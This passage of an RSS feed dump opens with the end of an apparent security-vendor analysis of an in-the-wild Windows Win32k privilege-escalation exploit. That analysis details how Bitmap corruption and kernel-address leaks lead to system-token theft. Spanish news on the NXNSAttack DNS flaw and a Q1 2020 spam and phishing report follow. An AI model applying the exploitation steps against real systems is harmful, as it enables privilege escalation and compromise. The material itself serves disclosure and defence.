gpsi->mpFnidPfn[(dwType + 6) & 0x1F]((tagWND *)wnd, msg, wParam, lParam, resultInfo);

It’s important to provide the right message and dwType parameters. The message needs to be equal to WM_CREATE. dwType is converted to fnIndex internally with the following calculation: (dwType + 6) & 0x1F. The exploit uses a dwType equal to 0xE0. It results in an fnIndex equal to 6 which is the function index of xxxSwitchWndProc and the WM_CREATE message sets the FNID field to be equal to FNID_SWITCH.

LRESULT xxxSwitchWndProc(tagWND *wnd, UINT msg, WPARAM wParam, LPARAM lParam)
{
...
  pti = *(tagTHREADINFO **)&gptiCurrent;
  if ( wnd->fnid != FNID_SWITCH )
  {
    if ( wnd->fnid || wnd->cbwndExtra + 296 < (unsigned int)gpsi->mpFnid_serverCBWndProc[6] )
      return 0i64;
    if ( msg != 1 )
      return xxxDefWindowProc(wnd, msg, wParam, lParam);
    if ( wnd[1].head.h )
      return 0i64;
    wnd->fnid = FNID_SWITCH;
  }
  switch ( msg )
  {
    case WM_CREATE:
      zzzSetCursor(wnd->pcls->spcur, pti, 0i64);
      break;
    case WM_CLOSE:
      xxxSetWindowPos(wnd, 0, 0);
      xxxCancelCoolSwitch();
      break;
    case WM_ERASEBKGND:
    case WM_FULLSCREEN:
      pti->ptl = (_TL *)&pti->ptl;
      ++wnd->head.cLockObj;
      xxxPaintSwitchWindow(wnd, pti, 0i64);
      ThreadUnlock1();
      return 0i64;
  }
  return xxxDefWindowProc(wnd, msg, wParam, lParam);
}

The vulnerability in NtUserSetWindowLongPtr can then be used to overwrite the extra data at index zero, which happens to be a pointer to a structure containing information about the Switch Window. In other words, the vulnerability makes it possible to set some arbitrary kernel pointer that will be treated as this structure.

At this stage it’s enough to call NtUserMessageCall again, but this time with a message equal to WM_ERASEBKGND. This results in the execution of the function xxxPaintSwitchWindow that increments and decrements a couple of integers located by the pointer that we previously set.

sub     [rdi+60h], ebx
add     [rdi+68h], ebx
...
sub     [rdi+5Ch], ecx
add     [rdi+64h], ecx

An important condition for triggering the exploitable code path is that the ALT key needs to be pressed.

Exploitation is performed by abusing Bitmaps. For successful exploitation a few Bitmaps need to be allocated next to each other, and their kernel addresses need to be known. To achieve this, the exploit uses two common kernel ASLR bypass techniques. For Windows 7 and Windows 10 build 10240 (Threshold 1) the Bitmap kernel addresses are leaked via the GdiSharedHandleTable technique: in older versions of the OS there is a special table available in the user level that holds the kernel addresses of all GDI objects present in the process. This particular technique was patched in Windows 10 build 14393 (Redstone 1), so for this version the exploit uses another common technique that abuses Accelerator Tables (patched in Redstone 2). It involves creating a Create Accelerator Table object, leaking its kernel address from the gSharedInfo HandleTable available in the user level, and then freeing the Accelerator Table object and allocating a Bitmap reusing the same memory address.

The whole exploitation process works as follows: the exploit creates three bitmaps located next to each other and their addresses are leaked. The exploit prepares Switch Window and uses a vulnerability in NtUserSetWindowLongPtr to set an address pointing near the end of the first Bitmap as Switch Window extra data. Bitmaps are represented by a SURFOBJ structure and the previously set address needs to be calculated in a way that will make the xxxPaintSwitchWindow function increment the sizlBitmap field of the SURFOBJ structure for the Bitmap allocated next to the first one. The sizlBitmap field indicates the bounds of the pixel data buffer and the incremented value will allow the use of the function SetBitmapBits() to perform an out-of-bounds write and overwrite the SURFOBJ of the third Bitmap object.

The pvScan0 field of the SURFOBJ structure is an address of the pixel data buffer, so the ability to overwrite it with an arbitrary pointer results in arbitrary read/write primitives via the functions GetBitmapBits()/SetBitmapBits(). The exploit uses these primitives to parse the EPROCESS structure and steal the system token. To get the kernel address of the EPROCESS structure, the exploit uses the function EnumDeviceDrivers. This function works according to its MSDN description and it provides a list of kernel addresses for currently loaded drivers. The first address in the list is the address of ntkrnl and to get the offset to the EPROCESS structure the exploit parses an executable in search for the exported PsInitialSystemProcess variable.

It’s worth noting that this technique still works in the latest versions of Windows (tested with Windows 10 19H1 build 18362). Stealing the system token is the most common post exploitation technique that we see in the majority of elevation of privilege exploits. After acquiring system privileges the exploit downloads and executes the actual malware.

Conclusions

It was particularly interesting for us to examine the Chrome exploit because it was the first Google Chrome in-the-wild zero-day encountered for a while. It was also interesting that it was used in combination with an elevation of privilege exploit that didn’t allow exploitation on the latest versions of Windows mostly due to the Win32k lockdown security feature of Google Chrome. With regards to privilege elevation, it was also interesting that we found another 1-day exploit for this vulnerability just one week after the patch, indicating how simple it is to exploit this vulnerability.

We would like to thank the Google Chrome and Microsoft security teams for fixing these vulnerabilities so quickly. Google was generous enough to offer a bounty for CVE-2019-13720. The reward was donated to charity and Google matched the donation.

Contributor:
Copyright:
Category: APT reports
Date: Thu, 28 May 2020 10:00:09 +0000
Local date: Thu, 28 May 2020 10:00:09 +0000
Latitude:
Longitude:
Language: en-US
Encoding: UTF-8
Feed type: RSS
itemImageThumbnailUrl:
itemImageWidth: 1200 px
itemImageHeight: 800 px
Nueva vulnerabilidad en DNS puede explotar sus principios más esenciales para distribuir ataques DDoS
Author: Securelist
Link :
Email :
Description: Un equipo de investigadores ha descubierto una vulnerabilidad en el Sistema de Nombres de Dominio (DNS) que podría explotarse para lanzar ataques Distribuidos de Negación de Servicio en cantidades masivas y con muy pocos recursos. La vulnerabilidad recibió el nombre… Leer el artículo completo
Full content:

no-image

Un equipo de investigadores ha descubierto una vulnerabilidad en el Sistema de Nombres de Dominio (DNS) que podría explotarse para lanzar ataques Distribuidos de Negación de Servicio en cantidades masivas y con muy pocos recursos. La vulnerabilidad recibió el nombre de NXNSAttack, y se encuentra el mecanismo de delegación de DNS.

Los investigadores Lior Shafir y Yehuda Afek de la Universidad de Tel Aviv, y Anat Bremler-Barr del Centro Interdisciplinario Herzliya, descubrieron el problema y alertaron sobre sus particularidades y peligros.

Los investigadores explicaron que la vulnerabilidad puede dar paso a que se fuerce a los resolutores DNS a generar más solicitudes de las necesarias. Esto puede ser explotado por un atacante, que puede utilizar esta falla para saturar con estas solicitudes un sitio web de su elección hasta dejarlo inoperante. El ataque puede ampliar más de 1.620 veces la cantidad de paquetes que se intercambian.

Los investigadores aseguran que informaron a las organizaciones correspondientes con anticipación para darles tiempo de desarrollar un parche, pero que uno de los problemas es que la vulnerabilidad no se puede parchar del todo, sólo se pueden ofrecer medidas de contención ante ataques NXNSAttack.

“Por desgracia, NXNSAttack abusa del principio más básico del protocolo DNS, lo que en esencia implica que no existe una solución, sólo formas de mitigarlo”, dijo Petr Špaček, que colaboró a en la investigación de los expertos israelíes desde la República Checa.

Aun así, las compañías afectadas no se están quedando con los brazos cruzados y proveedores de servicios web y en la nube como Google, Microsoft, Amazon Web Services y Cloudfare han parchado sus sistemas para evitar ser víctima de este ataque.

Microsoft ya ha lanzado la alerta ADV200009 para mitigar los ataques DNS que abusen de NXNSAttack.

“Para explotar esta vulnerabilidad, un atacante necesita tener acceso a al menos un cliente y dominio que responda con una gran cantidad de registros de referencia, sin DNS asociados, que dirijan a subdominios externos de la víctima. Mientras se resuelve el nombre del cliente del atacante, por cada registro de referencia que se encuentra, se resuelve contactar el dominio de la víctima. Esto puede generar una gran cantidad de comunicaciones entre la resolución y el servidor DNS, lo que causa un ataque Distribuido de Negación de Servicio (DDoS)”, explicó Microsoft.

Es por esto que, para mitigar el ataque, Microsoft ha puesto a disposición la herramienta Set-DnsServerResponseRateLimiting, que limita la cantidad de respuestas que se envían al servidor. Esto evitará que un servidor DNS de Windows se utilice para amplificar un ataque contra otro cliente, pero no evita que el servidor mismo sea atacado.

Fuentes

NXNSAttack technique can be abused for large-scale DDoS attacks • ZDNet
Microsoft issues mitigation for the NXNSAttack DNS DDoS attack • Bleeping Computer
Researchers warn of unfixable DNS denial of service NXNSAttack • IT News

Contributor:
Copyright:
Category: News
Date: Wed, 27 May 2020 08:32:24 +0000
Local date: Wed, 27 May 2020 08:32:24 +0000
Latitude:
Longitude:
Language: es-ES
Encoding: UTF-8
Feed type: RSS
itemImageThumbnailUrl:
itemImageWidth: px
itemImageHeight: px
Spam y phishing en el primer trimestre de 2020
Author: Tatyana Shcherbakova
Link :
Email :
Description: Al observar los resultados del primer trimestre de 2020, asumimos que en el futuro, el tema de la COVID-19 será utilizado activamente por los ciberdelincuentes. Para atraer la atención de posibles víctimas, la pandemia se mencionará incluso en páginas falsas "estándar" y en correos no deseados.
Full content:

Particularidades del trimestre

Comprar un boleto sin quemarse en el intento

El festival Burning Man es uno de los eventos más esperados entre los fanáticos de recitales espectaculares e instalaciones artísticas. El principal obstáculo para las personas que desean asistir es la compra de entradas, porque no son asequibles: una entrada estándar cuesta 475 dólares, su número es limitado y el proceso de compra es todo un reto (ocurre en varias etapas, los datos de registro deben ingresarse en un momento exacto y si algo sale mal, puede que no haya una segunda oportunidad). Por lo tanto, las entradas que unos estafadores ofrecían por la mitad del precio en un sitio web falso, eran una excelente carnada.

Al hacer el sitio web, los estafadores se esforzaron para que su diseño fuera similar al del sitio original. Hasta la página con la descripción de las entradas era idéntica a la del sitio web oficial.

No obstante, había tres diferencias sustanciales con respecto al original: solo la página principal y la sección de compra de boletos funcionaban en el sitio, los boletos se vendían sin pasar por las etapas de registro y su precio difería de los precios en el sitio oficial (225 versus 475 dólares).

Estafadores ganadores del Oscar

En febrero de 2020, se celebró la ceremonia de entrega de los premios de la Academia de las Artes y las Ciencias Cinematográficas de E.E.U.U.: el Oscar. Sin embargo, incluso antes de su apertura, aparecieron sitios en Internet que ofrecían ver gratis las películas nominadas. Los estafadores apuntaban a los usuarios que deseaban ver estas películas antes de la entrega de premios.

Para promover estos sitios, crearon cuentas de Twitter, cada una dedicada a una película nominada.

Para ver la película, a los interesados se les pedía ir al sitio web, donde se les mostraba los primeros minutos, y luego debían registrarse para seguir viéndola.

Al registrarse, la víctima debía ingresar la información de una tarjeta bancaria, supuestamente para confirmar su región de residencia. Por supuesto, después de hacerlo cierta cantidad de dinero desaparecía irremediablemente de su cuenta, pero la transmisión de la película no se reanudaba.

El usuario podría haberse puesto en guardia al ver que se usaban enlaces cortos en las publicaciones en las redes sociales. Los estafadores a menudo los usan en sus actividades, ya que es imposible determinar a dónde conduce la URL “acortada” sin seguirla.

Existen servicios especiales que permiten verificar qué hay oculto detrás de dicho enlace, además que ofrecen una ventaja adicional: el cliente recibe un veredicto sobre la seguridad del contenido del sitio. Una verificación tan exhaustiva es importante cuando se obtienen enlaces de una fuente no confiable.

Se alquila documento de identidad

La Comisión Federal de Comercio (FTC, por sus siglas en inglés) puede imponer grandes multas a las empresas estadounidenses que han filtrado datos de clientes. Por ejemplo, en el caso de Facebook en 2019, la multa ascendió a 5 mil millones de dólares. Sin embargo, los usuarios a quienes les robaron sus datos no reciben ninguna compensación. Esto es lo que los estafadores aprovecharon al lanzar un envío masivo que ofrecía una compensación del inexistente Fondo de Protección de Datos Personales, creado por una falsa Comisión de Comercio de Estados Unidos.

Los atacantes, inspirados por la idea de los servicios para verificar cuentas en busca de fugas, crearon su propio servicio. Allí le ofrecían al visitante verificar si le habían robado los datos de su cuenta y, de ser así (y no hay otra variante, incluso si ingresa datos disparatados en el formulario), prometían una compensación “por la fuga de datos personales”.

Para recibir la compensación, no importaba la ciudadanía de la víctima, lo más importante era el nombre, apellido, teléfono y cuentas de redes sociales. Para darle mayor credibilidad, en la página aparecía varias veces un mensaje de advertencia sobre las graves consecuencias para aquellos que decidieran utilizar los datos de otras personas para obtener una compensación.

Para recibir los fondos, un ciudadano estadounidense tenía que ingresar un Número de Seguro Social (SSN). Todos los demás solo tenían que marcar la casilla “I’am don’t have SSN” (tales errores en los sitios “oficiales” son un buen indicador de su falsedad), después de lo cual se les ofrecía la opción de alquilar un SSN por 9 dólares. Es de destacar que incluso si el usuario ya tenía un SSN, se le ofrecía insistentemente alquilar otro.

Después de eso, se remitía a la víctima potencial a la página de pago, que mostraba una suma que dependía de la ubicación del usuario. Por ejemplo, a los usuarios de Rusia se les ofrecía hacer el pago en rublos.

Los estafadores actuaban según un esquema clásico (bastante difundido en el segmento ruso de Internet): le pedían a la víctima que pagara una pequeña comisión o un anticipo para recibir una gran cantidad de dinero. En el primer trimestre, se bloquearon 14 725 643 intentos de transferir usuarios a sitios con estafas similares.

Cataclismos y pandemia

Incendios en Australia

El desastre natural que azotó el continente australiano fue otra oportunidad de lucrar para los estafadores. Por ejemplo, un “correo nigeriano” contaba la historia de una moribunda millonaria con cáncer dispuesta a donar su capital para salvar los bosques australianos. Se le ofrecía a la víctima ayudarle a retirar sus ahorros de las cuentas, mediante el pago de una pequeña comisión, o “donar” fondos para pagar los servicios de un abogado, y después de un tiempo recibir una suma redonda como recompensa.

Además de los millonarios, también otros amantes de la naturaleza que querían contribuir a la lucha contra la furia de los elementos enviaron cartas más concisas, cuya esencia se reducía al mismo esquema de retiro de fondos.

COVID-19

Esquema nigeriano

Por supuesto, los estafadores no podían ignorar el beneficioso  tema del COVID-19: filántropos inexistentes y moribundos millonarios ofrecía recompensas por ayudar con el retiro de fondos que irían a la ayuda humanitaria. Además, se invitaba a los destinatarios a ayudar con la producción de una vacuna milagrosa ya desarrollada o a participar en una lotería de caridad, cuyos beneficios ayudarían a los pobres afectados por la pandemia.

Bitcoins para la lucha contra el coronavirus

Fingiendo ser miembros de una organización médica, los estafadores sugerían transferir una cierta cantidad a determinada billetera de Bitcoin. La donación supuestamente iría a la lucha contra el coronavirus, la creación de una vacuna y ayudar a las víctimas de la pandemia.

 

En una de las listas de correo, los atacantes intentaron aprovechar el miedo a contraer el coronavirus: en una carta, un vecino no identificado afirmaba que estaba muriendo por el coronavirus e infectaría al receptor si este no pagaba el rescate (que garantizaría una vejez cómoda para los creadores de este ransomware).

Peligrosas recomendaciones de la OMS

Uno de los correos fraudulentos, que supuestamente era de la lista de contactos de la Organización Mundial de la Salud, ofrecía conocer los pasos a seguir para protegerse de la infección por COVID-19.

Para obtener información, había que seguir un enlace que conducía un sitio de la OMS falso, pero el engaño solo se podía descubrir si se miraba la barra de direcciones, ya que el diseño era casi idéntico al original. El propósito de los atacantes era obtener los datos de cuentas del sitio web de la OMS. Además, si en los primeros correos solo se requería un nombre de usuario y una contraseña para la “autenticación”, en los correos posteriores ya solicitaban además un número de teléfono.

También encontramos varias cartas enviadas en nombre de la OMS que contenían documentos con malware, que pedían al destinatario abrir el archivo adjunto (en formato DOC o PDF) y conocer las medidas de prevención del coronavirus. Por ejemplo, esta carta contenía Backdoor.Win32.Androm.tvmf:

Había listas de correo más simples con adjuntos peligrosos, por ejemplo, con Trojan-Spy.Win32.Noon.gen:

 

Segmento corporativo

El tema del coronavirus también se utilizó en ataques contra el sector corporativo. Por ejemplo, el COVID-19 se mencionaba en cartas fraudulentas como una razón para el retraso en el envío de productos o la necesidad de volver a ordenar los pedidos. Los autores de los mensajes exigían que los archivos adjuntos se procesasen de inmediato.

Otro boletín sugería verificar si la compañía estaba en la lista de empresas que habían cerrado debido a la pandemia. Después, había que rellenar una solicitud y, de no hacerlo,  amenazaban con cerrar la empresa. Supuestamente, la lista de empresas y la declaración se encontraban en los archivos adjuntos a la carta. Pero en realidad los archivos adjuntos contenían Trojan-PSW.MSIL.Agensla.a:

También registramos un ataque de phishing contra usuarios corporativos. Una página falsa ofrecía a sus visitantes monitorear la situación del coronavirus en el mundo utilizando un sitio web especial, pero para empezar a usarla se requería ingresar el nombre de usuario y la contraseña del correo corporativo.

Compensaciones gubernamentales

Debido a la introducción de medidas para contrarrestar la pandemia, muchas personas se encuentran en una situación financiera difícil. La interrupción de la producción y el tiempo de inactividad forzado en muchas industrias tienen un impacto negativo en el bienestar financiero. En esta situación, los sitios web que ofrecen compensación en nombre del estado representan un peligro particular.

Nuestro colega de Brasil nos contó sobre otro popular truco relacionado con la asistencia financiera a las víctimas de la pandemia. La víctima recibía por WhatsApp un mensaje  sobre asistencia financiera o alimentaria supuestamente enviado por un supermercado, banco o el gobierno. Para recibirlo, tenía que rellenar un cuestionario y compartir el mensaje con cierta cantidad de contactos. Una vez rellenado el cuestionario, los datos de la víctima se enviaban a los atacantes, y a ella se la remitía a una página de publicidad, un sitio de phishing o a un sitio para obtener una suscripción SMS de pago, etc.

Suponemos que el número de sitios fraudulentos que ofrecen pagos en nombre del estado no hará más que crecer e instamos a tener precaución ante las promesas de compensación o asistencia material.

Protección contra virus con entrega a domicilio

Debido a la difícil situación epidemiológica, la demanda de antisépticos y agentes antivirales ha aumentado considerablemente. Registramos una gran cantidad de correos con ofertas de comprar máscaras antibacterianas.

En América Latina, a través de los correos de WhatsApp,  los usuarios recibieron invitaciones para participar en el sorteo de kits de gel para desinfección de manos de la empresa cervecera Ambev. Es cierto que la compañía comenzó a producir antisépticos, pero estaban destinados exclusivamente a hospitales estatales, y la lotería entre los usuarios de WhatsApp era un truco fraudulento.

Ha aumentado considerablemente el número de sitios fraudulentos que ofrecen remedios caseros para el tratamiento del coronavirus, medicamentos para fortalecer el sistema inmunológico, termómetros sin contacto y pruebas. La mayoría de los productos ofrecidos no tiene efectividad comprobada.

En promedio, la cantidad diaria de mensajes que mencionaban la COVID-19 en el primer trimestre ascendió a cerca del 6% de todo el tráfico basura. Más del 50% de los mensajes spam relacionados con el coronavirus estaba en inglés. Suponemos que la cantidad de sitios de phishing y estafas relacionadas con pandemias irá en constante aumento y los cibercriminales utilizarán nuevos esquemas en sus ataques.

Estadísticas: spam

Porcentaje de spam en el tráfico de correo

Porcentaje de spam en el tráfico de correo mundial, cuarto trimestre de 2019 – primer trimestre de 2020 (descargar)

En el primer trimestre de 2020, la mayor parte del spam se registró en enero: 55,76%. El porcentaje promedio de spam en el tráfico mundial de correo fue del 54,61%, un 1,58% menos que en el informe del trimestre anterior.

Proporción de spam en el tráfico de correo del sector ruso de Internet, cuarto trimestre de 2019 – primer trimestre de 2020 (descargar)

En el primer trimestre, la proporción de spam en el tráfico del segmento ruso de Internet también alcanzó su máximo en enero: 52,08%. Al mismo tiempo, el indicador promedio, como en el cuarto trimestre, permanece ligeramente más bajo que el promedio global (en 3,20 puntos porcentuales).

Países fuente de spam

Países fuente de spam en el mundo, primer trimestre de 2020 (descargar)

En el primer trimestre de 2020, Rusia lideró el TOP 5 de países en términos de spam saliente. Representó el 20,74% de todo el tráfico basura. Estados Unidos ocupó el segundo lugar (9,64%) y en el tercer lugar, con un margen de solo 0,23 pp, esta vez tenemos a Alemania (9,41%). Francia ocupó el cuarto lugar (6,29%), y China (5,22%), país que suele estar entre los tres primeros de las fuentes de spam, se ubicó en el cuarto.

Brasil ocupó el sexto lugar (3,56%), Países Bajos el séptimo (3,38%), seguido de Vietnam (2,55%). Un poco más abajo están España ( 2,34%) y Polonia (2,21%).

Tamaño de los mensajes spam

Tamaño de los mensajes de spam, cuarto trimestre de 2019 – primer trimestre de 2020 (descargar)

En comparación con el cuarto trimestre de 2019, en el primer trimestre de 2020 la proporción de mensajes muy pequeños (de hasta 2 Kbytes) disminuyó en más de 6 puntos porcentuales y constituyó el 59,90%. El porcentaje de mensajes de entre 5 y 10 KB, por el contrario, tuvo un ligero aumento (de un 0,72 %) en comparación con el trimestre anterior, y fue del 5,56%.

La proporción de mensajes que varían en tamaño de 10 a 20 Kbytes también aumentó (en 3,32 pp) y ascendió al 6,36%. Junto con esto, el número de mensajes grandes, de 100 a 200 KB, aumentó (más de 2,70 pp). Su indicador en el primer trimestre de 2020 ascendió al 4,50%.

Archivos adjuntos maliciosos: familias de malware

 

Número de reacciones del antivirus de correo, cuarto trimestre de 2019 – primer trimestre de 2020 (descargar)

En total, en el primer trimestre de 2020, nuestras soluciones de protección detectaron 49 562 670 archivos adjuntos de correo electrónico malicioso, cifra casi idéntica a la del periodo cubierto por el informe anterior: en el cuarto trimestre de 2019, se detectaron otros 314 862 archivos adjuntos maliciosos.

TOP 10 de archivos adjuntos maliciosos en el tráfico de correo electrónico, primer trimestre de 2020 (descargar)

En el primer trimestre, el primer lugar en términos de prevalencia en el tráfico de correo lo ocupó Trojan.Win32Agentb.gen (12,35%), el segundo, el malware de “oficina” Exploit.MSOffice.CVE-2017-11882.gen (7,94%) y el tercero, el gusano Worm.Win32.WBVB.vam (4,19%).

TOP 10 de familias de malware en el tráfico de correo electrónico, primer trimestre de 2020 (descargar)

En cuanto a las familias de malware, en este trimestre la más difundida fue Trojan.Win32.Agentb (12,51%), en el segundo lugar se ubicó la familia Exploit.MSOffice.CVE-2017-11882 (7,98%), cuyos representantes explotan una vulnerabilidad en Microsoft Equation Editor, y en el tercero, la familia Worm.win32.wbvb (4,65%).

Países de destino de los envíos maliciosos

 

Distribución de reacciones del antivirus de correo según países, primer trimestre de 2020 (descargar)

El primer lugar por el número de detecciones de antivirus de correo en el primer trimestre de 2020 fue para España. En este país, el 9,66% de los usuarios de las soluciones de seguridad de Kaspersky en todo el mundo se toparon con malware en el correo. Alemania ocupó el segundo lugar (8,53%) y Rusia el tercero (6,26%).

Estadísticas: phishing

En el primer trimestre de 2020, gracias al sistema Anti-Phishing se neutralizaron 119 115 577  intentos de remitir usuarios a páginas fraudulentas. El porcentaje de usuarios únicos atacados fue del 8,80% del número total de usuarios de productos de Kaspersky Lab en el mundo.

Geografía de los ataques

Esta no es la primera vez que Venezuela se convierte en el país con la mayor proporción de usuarios atacados por phishers (20,53%).

 

Geografía de ataques de phishing, primer trimestre de 2020 (descargar)

En segundo lugar, con un rezago de 5,58 pp, se ubica otro país que a menudo figura entre los tres primeros: Brasil (14;95%). Un poco más abajo, le sigue Australia (13,71%).

País %*
Venezuela 20,53%
Brasil 14,95%
Australia 13,71%
Portugal 12,98%
Argelia 12,12%
Francia 11,71%
Honduras 11,62%
Grecia 11,58%
Myanmar 11,54%
Túnez 11,53%

* Porcentaje de usuarios en cuyos equipos reaccionó el sistema Antiphishing, del total de usuarios de productos de Kaspersky Lab en el país

Organizaciones atacadas

La estadística de las categorías de las organizaciones atacadas por los phishers se basa en las detecciones de nuestro antiphishing en los equipos de los usuarios. Este componente detecta las páginas con contenidos phishing a las que el usuario trata de llegar al pulsar enlaces contenidos en el mensaje o en Internet. Carece de importancia de qué forma se haga el paso: sea como resultado de pulsar un enlace en un mensaje phishing, en un mensaje de una red social o debido a las acciones de un programa malicioso. Cuando el sistema de defensa reacciona, el usuario recibe una advertencia sobre la posible amenaza.

El mayor número de ataques de phishing en el primer trimestre de 2020 afectó a las organizaciones de la categoría “Tiendas en línea”, con una participación del 18,12%. El segundo lugar fue para “Portales globales de Internet” (16,44%), mientras que la categoría “Redes sociales” quedó en tercer lugar (13,07%).

Distribución por categorías de las organizaciones cuyos usuarios fueron atacados por los phishers, primer trimestre de 2020 (descargar)

En cambio la categoría “Bancos”, que antes había estado consistentemente entre las tres primeras, bajó al cuarto lugar con el 10,95%.

Conclusiones

Al observar los resultados del primer trimestre de 2020, asumimos que en el futuro, el tema de la COVID-19 será utilizado activamente por los ciberdelincuentes. Para atraer la atención de posibles víctimas, la pandemia se mencionará incluso en páginas falsas “estándar” y en correos no deseados.

Aparte de usarse para llamar la atención, el tema de la pandemia se utiliza en esquemas fraudulentos que ofrecen varias compensaciones y ayuda material. Con un alto grado de probabilidad, este tipo de fraude ocurrirá con cada vez mayor frecuencia.

El promedio de spam en el tráfico mundial de correo (54,61%) este trimestre disminuyó en 1,58 puntos porcentuales en comparación con el período cubierto por el informe anterior, y el número de intentos de desviar a usuarios a páginas de phishing ascendió a casi 120 millones.

Este trimestre, Rusia ocupó el primer lugar en la lista de fuentes de spam, con una participación del 20,74%. Nuestras soluciones de seguridad bloquearon 49 562 670 archivos adjuntos de correo electrónico malicioso, y la familia de malware más popular en el correo electrónico fue Trojan.Win32.Agentb.gen: su participación en el tráfico de correo fue del 12,35%.

Contributor:
Copyright:
Category: Destacados
Date: Tue, 26 May 2020 10:00:17 +0000
Local date: Tue, 26 May 2020 10:00:17 +0000
Latitude:
Longitude:
Language: es-ES
Encoding: UTF-8
Feed type: RSS
itemImageThumbnailUrl:
itemImageWidth: 1280 px
itemImageHeight: 800 px